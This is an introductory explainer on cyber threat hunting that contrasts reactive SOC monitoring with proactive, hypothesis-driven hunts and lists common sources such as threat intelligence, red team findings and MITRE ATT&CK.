# What is cyber threat hunting? ## Security monitoring **Cybersecurity monitoring** has traditionally been **reactive** where detections are **based on signatures/hashes/heuristic** utilized by security solutions Use cases provide means for SOCs to detect threats based on custom correlation of suspicious activity within an organization and still be reactive in nature A SOC analyst reviews alerts coming into a SIEM or similar solution, analyzes and responds to them accordingly ### Challenges **Unknown threats bypass traditional security controls** and remain in the environment, sometimes until they'r noticed by an external agency Sophisticated attackers have the tools and the skill set to bypass traditional defenses SOC analysts may deal with **alert fatigue due to too many alerts** generated by the various security solutions **Visibility gaps** in the environment will **degrade the detection** process as you can't monitor what you can't see ## What is threat hunting? **Threat hunting** is a proactive, rather than reactive, approach to identifying threats in an environment It utilizes a **hypothesis-based analyst-drive approach** to identify, prioritize, execute, record and report hunts in the environment The goal of threat hunting is to **identify potential threats** before they can cause harm, by using various techniques, methodologies and hypothesis-driven investigation It enhances the security posture of your organization by identifying threats that are not detected through traditional avenues ### Why is it important? Reaching an all-time high, the cost of a data breach averaged USD 4.35 million in 2022 The average time to identify and contain a data breach was **277 days** **Proactive strategies reduce response times and fiscal impacts**: * Organizations with XDR technologies identified and contained a breach 29 days faster than those without * Average breach cost reductions with AI/Automated Solutions - 3.05 million * Average breach cost reductions with incident response (IR) team and regularly tested IR plan - 2.66 million * Average cost savings associated with zero-trust deployment - 1 million ## Who is a threat hunter? **Cybersecurity professional** who proactively seeks to uncover threats in an environment not detected by existing detection controls Someone who is well-versed in **security analysis** and has **domain knowledge** to distinguish normal from suspicious behavior Uses various **threat hunting sources** to identify potential hunts, **develops a hypothesis** to **guide the hunts, executes and reports** on them Uses various **threat hunting methodologies and techniques** to uncover threats in the environment that are not detected via existing detection mechanisms ## Threat hunting sources Threat hunters rely on different sources of information to create hunts, such as the following: ### **Threat intelligence** **Collection of data related to known threats and threat actors** * Threat actors targeting your organization * Information sharing between organizations within the same sector * Zero-day exploits against similar organizations * New vulnerabilities being leveraged by attackers ### **Internal finding** The **findings identified** by various teams conducting assessments * Internal audit * Enterprise risk teams * Red Team ### Security incidents Lessons learned phase of incident response captures valuable that could be leveraged by threat hunting. These could be tactics and techniques identified during incident response, gaps in coverage, vulnerabilities, etc ### MITRE ATT\&CK framework Tactics and techniques outlined in the framework are great resources to identify and prioritize hunts to be conducted within your organization ### Organizational knowledge Knowledge of known gaps, broken processes, etc derived from time spent with an organization is another great source for threat hunting ### Anomalous activity Activity that deviates from established security configurations or behaviors in another input for threat hunting